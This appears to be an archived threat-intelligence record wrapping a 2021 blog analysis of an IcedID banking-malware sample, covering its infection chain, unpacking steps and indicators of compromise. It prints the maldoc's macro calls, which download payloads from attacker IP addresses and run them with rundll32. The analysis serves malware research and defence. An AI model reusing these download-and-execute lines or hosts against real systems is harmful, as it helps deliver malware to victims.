{ "id": "4c848b50-f331-4ee5-ad49-59ad764481b4", "created_at": "2026-04-06T00:15:58.990085Z", "updated_at": "2026-04-10T13:11:28.557016Z", "deleted_at": null, "sha1_hash": "928b28d3a410b7cf75241aa3f272322afa5e9c5f", "title": "IcedID Analysis", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2056075, "plain_text": "IcedID Analysis\r\nPublished: 2021-04-09 · Archived: 2026-04-06 00:04:59 UTC\r\nIcedID aka (BokBot) is banking malware designed to steal financial information. Lunar Spider is the threat actor behind\r\nIcedID which they’ve been running campaigns since at least 2017. Beside stealing banking information, some incident show\r\nthat IcedID is an entry stage to ransomware or RAT attack. It’s been observed lately that the threat actor has been using new\r\ntechniques to evade detection by endpoint security, sandbox, and anti-reversing. Which makes it interesting to try dissecting\r\nsamples to find out indicators and other artifacts that could be missed by security tools.\r\nIn this post, will take a look at IcedID sample that’s been posted on Malware-traffic-analysis.net. Will walkthrough each\r\nartifact to learn how to unpack the hidden malicious binaries. These techniques would also work on other IcedID samples\r\nthat has been found lately.\r\nbehaviour overview\r\nThreat actor send an email with attached ZIP archived including maldoc either MS Word or Excel spreadsheet. When\r\nopening the the maldoc it asks to enable macros. Once enabled two function happens first download a DLL file and run it in\r\na process using ‘rundll32.exe’. The downloaded DLL has unknown extension. After running in process, the DLL file\r\n‘Installer’ does mainly two things: download a GZIP compressed binary and install it. The GZIP might have zip extension,\r\nbut it can’t be open or extracted with any archived tool. The GZIP mainly a dropper, it’s packed with two binaries. without\r\nfurther ado let’s get started with the below artifacts.\r\nFile Name Description File Type SHA256\r\n82025721897_03192021.xlsm Maldoc\r\nExcel\r\nspreadsheet\r\ndcc45c82a484a420888aabe66588cbb1658cb2a7a5cc833b0438fa06\r\nKiod.hod\r\nInstaller\r\nDLL\r\nDLL d1634c8dd16b4b1480065039fac62d6c1900692f0ccc9bf52c8ddc65\r\nsuit_32.tmp\r\nTemporary\r\nDLL\r\nDLL b8502cc6fd41a558012e7ccd0a7f4e0ed5746bf106b8bf5b6a27ef9cb\r\nOxiwko.dll\r\nPersistent\r\nDLL\r\nDLL 48b72914126b6b4a3e5aefa9bc8d5eac1187543eb0fa42c98a70a2f2a\r\nlicense.dat IcedID\r\nDLL!\r\n(encrypted)\r\n45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085b\r\nTable 1, List of IcedID artifacts to analyze\r\nmaldoc\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 1 of 13\n\nOne of the most recognized templated of IcedID spreadsheet that hides beside it XLM 4.0 functions to download and run\r\nprocess once hit Enable Content as typical maldoc.\r\nFigure 2, IcedID template\r\nIcedID use “Auto_Open” function to execute the entire XLM (4.0) script. Moving between sheets and cells, it’s possible to\r\ndebug the function step-by-step, but what’s worthy is to get IOCs which is in clear text.\r\nHost-based and Network-based IOCs\r\n--------Shell Command --------------------\r\nRundll32 ..\\Kiod.hod2,DllRegisterServer\r\n------------------------------------------\r\n--------Contacted IP Addresses -----------\r\n188.127.237.152\r\n45.150.67.13\r\n185.82.219.225\r\n------------------------------------------\r\n---------Calls --------------------------\r\n=CALL(\"URLMon\", \"URLDownloadToFileA\", \"JCCB\", 0, \"http://188.127.237.152/44295.4021160879.dat\", \"..\\Kiod.hod\")\r\n=CALL(\"URLMon\", \"URLDownloadToFileA\", \"JCCB\", 0, \"http://45.150.67.13/44295.4021160879.dat\", \"..\\Kiod.hod1\")\r\n=CALL(\"URLMon\", \"URLDownloadToFileA\", \"JCCB\", 0, \"http://185.82.219.225/44295.4021160879.dat\", \"..\\Kiod.hod2\")\r\n------------------------------------------\r\nFigure 3, Maldoc behavioral from Tria.ge sandbox\r\ninstaller dll\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 2 of 13\n\n‘Kiod.hod’ is the name of the first stage IcedID execution in this sample. It’s a 64-bit DLL with MZ header running in a\r\n‘rundll32’ create process from the maldoc. when checking the sample on Hatching Triage sandbox, the network shows\r\nrequests to ‘aws.amazon[.]com‘ and ‘calldivorce[.]fun‘. The installer download a GZIP file and install it. It’s not possible to\r\nview the network indicators when on statically analyzing this sample, nor when debugging it which is mostly sign of packed\r\nexecutable.\r\nFigure 4, Installer behavioral on tria.ge sandbox\r\nThere’s one library ‘kernel32.dll’ and no sign of imported APIs to help guide either statically or in debugger in order to\r\nunleash any indicators. Simply loading the sample on x64dbg doesn’t work! There’re multiple ways to unpack the installer\r\nDLL, however, the quick and possible way to unpack the binary by attaching the installer DLL to\r\n(~Windows\\System32\\rundll32) in x64dbg like steps below:\r\n1. x64dbg -\u003e File -\u003e Open -\u003e C:\\Windows\\System32\\rundll32.exe\r\n2. x64dbg -\u003e File -\u003e Change Command Line -\u003e \"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\~\\lab\\Kiod.dll\",DllRegisterServer\r\n* no spaces except the single space between \" \" and copy the full DLL directory\r\n** DllRegisterServer is the export function\r\n3. After hitting ok, go to Options -\u003e Preferences -\u003e Events tab -\u003e check ✔ DLL Entry\r\n4. Hit F9 (few seconds and pause)\r\nDirectly after pausing you can notice see the register ‘R14’ got PE sign and ready to Save Memory Region by dump it from\r\nMemory Map. The unpacked executable seems to be unmapped to memory and no changes required to addresses on the\r\nsections headers.\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 3 of 13\n\nFigure 5, unpack IcedID installer\r\n----------------------------------\r\nUnpacked Installer - unpacked file\r\n----------------------------------\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 4 of 13\n\nSHA256: 7459E88626A90B52C3392A14734D00A5238EDBF13C61907F39326DF2D4C3F922\r\nHOST IOC: C:\\ProgramData\\\r\nNetwork IOC: aws.amazon.com\r\n calldivorce.fun/~[GZIP file]\r\nsubmitted sample on (9 April 2021)\r\n23/61 VT: https://www.virustotal.com/gui/file/7459e88626a90b52c3392a14734d00a5238edbf13c61907f39326df2d4c3f922/detection\r\n10/10 Triage: https://tria.ge/210409-af3skeevmx/behavioral2\r\nother highlighted IOCs\r\nLibraries\r\n winhttp.dll\r\nImports (APIs)\r\nLookupAccountNameW ,advapi32.dll\r\nWinHttpQueryDataAvailable,winhttp.dll\r\nWinHttpConnect,winhttp.dll\r\nWinHttpSetStatusCallback,winhttp.dll\r\nWinHttpSendRequest,winhttp.dll\r\nWinHttpCloseHandle,winhttp.dll\r\nWinHttpSetOption,winhttp.dll\r\nWinHttpOpenRequest,winhttp.dll\r\nWinHttpReadData,winhttp.dll\r\nWinHttpQueryHeaders,winhttp.dll\r\nWinHttpOpen,network,winhttp.dll\r\nWinHttpReceiveResponse,winhttp.dll\r\nWinHttpQueryOption,winhttp.dll\r\nCreateProcessA,kernel32.dll\r\nSwitchToThread,kernel32.dll\r\nIt’s clear what APIs and libraries the original packed installer hiding which is detectable by any endpoint security as can see\r\nin Pestudio. Further disassembling with Cutter 2.0.0 the unpacked DLL to get indicators.\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 5 of 13\n\nFigure 6, Pestudio and Cutter views of unpacked installer\r\nTEMPORARY DLL\r\nsuit_32.tmp, is another 64-bit DLL. It dropped from GZIP with the ‘license.dat’ binary. Located in %temp% directory\r\nC:\\Users[username]\\AppData\\Local\\Temp\\suit_32.tmp\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 6 of 13\n\nThe main purpose of this temporary DLL to initiate persistent with ‘license.dat’ and later copy itself to another directory for\r\npersistent.\r\nRun method: rundll32.exe [filename],update /i:”LuxuryQuarter\\license.dat”\r\nThis artifact is also well packed for evasion and anti-analysis purposes. like the ‘installer’ no libraries or API to get hint\r\nwhere to breakpoint. To unpack :\r\n1. Load 'suit_32.tmp' in x64dbg\r\n2. Either single or over stepping till reaching [RtlExitUserProcess] API function\r\n3. Check the stack or RDI register for MZ header.\r\n4. Dump from Memory Map\r\nThe unpacked requires addresses matching because it were mapped to memory.\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 7 of 13\n\nFigure 7, x64dbg to unpack temporary DLL\r\n-----------------------------\r\nTemporary DLL - unpacked file\r\n-----------------------------\r\nSHA256: AD435DB375665D157AED16BA8B51735B65AC6AEE86864DA78408B44C9D85093B\r\nHOST IOC: C:\\ProgramData\\\r\nNetwork IOC: N/A\r\nSummitted sample on (4 April 2021)\r\n15/69 VT: https://www.virustotal.com/gui/file/ad435db375665d157aed16ba8b51735b65ac6aee86864da78408b44c9d85093b/detection\r\n1/10 Triage: https://tria.ge/210403-1sm7qxep8n/behavioral2\r\nOther highlighted IOCs\r\nImports (APIs)\r\nVirtualProtect, Kernel32.dll\r\nGetModuleFileNameA, Kernel32.dll\r\nAs compared with the packed version there’s a new C2 based on Triage sandbox analysis!\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 8 of 13\n\n/update/ 10 Apr\r\nit’s been brought up by community that the upper IPs are not C2s.\r\nPersistent DLL\r\n‘Oxiwko.dll’, suppose to be a copy from the previous temporary DLL. Big picture from Entropy view and Pestudio shows\r\nthe resemblance. Which makes it easy to unpack this sample using same method above with the temporary DLL.\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 9 of 13\n\nFigure 8, Persistent DLL matching with temp DLL\r\n------------------------------\r\nPersistent DLL - unpacked file\r\n------------------------------\r\nSHA256: c04101f36a7d1498379ff6abb2218a2730ad896908e525cd3664ea5cc4a56a18\r\nHOST IOC: C:\\ProgramData\\\r\nNetwork IOC: N/A\r\nSummitted sample on VT and Tria.ge (9 April 2021)\r\n21/69 VT: https://www.virustotal.com/gui/file/c04101f36a7d1498379ff6abb2218a2730ad896908e525cd3664ea5cc4a56a18/detection\r\n1/10 Triage: https://tria.ge/210409-tdel4edx32/static1\r\nOther highlighted IOCs\r\nImports (APIs)\r\nVirtualProtect, Kernel32.dll\r\nGetModuleFileNameA, Kernel32.dll\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 10 of 13\n\nThere’s not any network indicator in either packed or unpacked which make sense, because the very purpose of this file is\r\npersistent in Task Scheduler to load ‘license.dat’.\r\nFigure 9, Persistent [snap from malware-traffic-analysis]\r\nIcedID (license.dat)\r\nLeaving the beast for last! Even-though it’s been summited to VT by early March 1st, 2021. It’s still unrecognized by many\r\nvendors that ‘license.dat’ is the IcedID.\r\nHuge credit to BinaryDefense team for their efforts building the decryption tool for this part of IcedID and giving it a way\r\non Github.\r\nThe unknown ‘license.dat’ encrypted binary is running on Task Scheduler with the persistent DLL. As it turns out the\r\nunknown binary is also 64-bit DLL. Unlike the previous DLL, this is different kind of beast and this is what IcedID\r\n(BokBot) is all about. The decryption does a good job dissecting readable DLL from encrypted binary. However, due to very\r\ncomplication of this part is only possible to disassemble it in IDA, Cutter and other kind of disassemble tools. It’s not\r\npossible to debug it.\r\nNever the less, it’s possible to reverse engineer the function with proper disassembler to unleash the behavior which by\r\nlooking at it’s API list seems to be detectable by Endpoints. The main functions of ‘license.dat’ is collecting host and user\r\ninformation and connecting to C2.\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 11 of 13\n\nFigure 10, Decrypted license.dat\r\n---------------------------\r\nDecrypted license.dat file\r\n---------------------------\r\nSHA256: 66b6a55b67c0201a02dbdc4a2ef3c3f2d57aaadbbefa61c1bcdb59b96fb86743\r\nsubmitted on VT and Triage on (9 April 2021)\r\n16/67 VT: https://www.virustotal.com/gui/file/66b6a55b67c0201a02dbdc4a2ef3c3f2d57aaadbbefa61c1bcdb59b96fb86743/detection\r\n1/10 triage: https://tria.ge/210409-1satexfe4j\r\nFurther analysis will be taken to further analyze IcedID campaigns in general and ‘license.dat’ in particular to further\r\nunderstand its behavior.\r\nTO BE CONTINUED….\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 12 of 13\n\nCredit\r\nTo BinaryDefense, https://www.binarydefense.com/icedid-gziploader-analysis/ for providing the decryption tool\r\nTo Malware Traffic Analysis, https://www.malware-traffic-analysis.net/ for the artifacts, WireShark packets\r\nReferences\r\nhttps://www.group-ib.com/blog/icedid\r\nSource: https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/" ], "report_names": [ "icedid-analysis" ], "threat_actors": [ { "id": "c2385aea-d30b-4dbc-844d-fef465cf3ea9", "created_at": "2023-01-06T13:46:38.916521Z", "updated_at": "2026-04-10T02:00:03.144667Z", "deleted_at": null, "main_name": "LUNAR SPIDER", "aliases": [ "GOLD SWATHMORE" ], "source_name": "MISPGALAXY:LUNAR SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7cfe3bc9-7a6c-4ee1-a635-5ea7b947147f", "created_at": "2024-06-19T02:03:08.122318Z", "updated_at": "2026-04-10T02:00:03.652418Z", "deleted_at": null, "main_name": "GOLD SWATHMORE", "aliases": [ "Lunar Spider " ], "source_name": "Secureworks:GOLD SWATHMORE", "tools": [ "Cobalt Strike", "GlobeImposter", "Gozi", "Gozi Trojan", "IcedID", "Latrodectus", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "475ea823-9e47-4098-b235-0900bc1a5362", "created_at": "2022-10-25T16:07:24.506596Z", "updated_at": "2026-04-10T02:00:05.015497Z", "deleted_at": null, "main_name": "Lunar Spider", "aliases": [ "Gold SwathMore" ], "source_name": "ETDA:Lunar Spider", "tools": [ "BokBot", "IceID", "IcedID", "NeverQuest", "Vawtrak", "grabnew" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434558, "ts_updated_at": 1775826688, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/928b28d3a410b7cf75241aa3f272322afa5e9c5f.pdf", "text": "https://archive.orkl.eu/928b28d3a410b7cf75241aa3f272322afa5e9c5f.txt", "img": "https://archive.orkl.eu/928b28d3a410b7cf75241aa3f272322afa5e9c5f.jpg" } }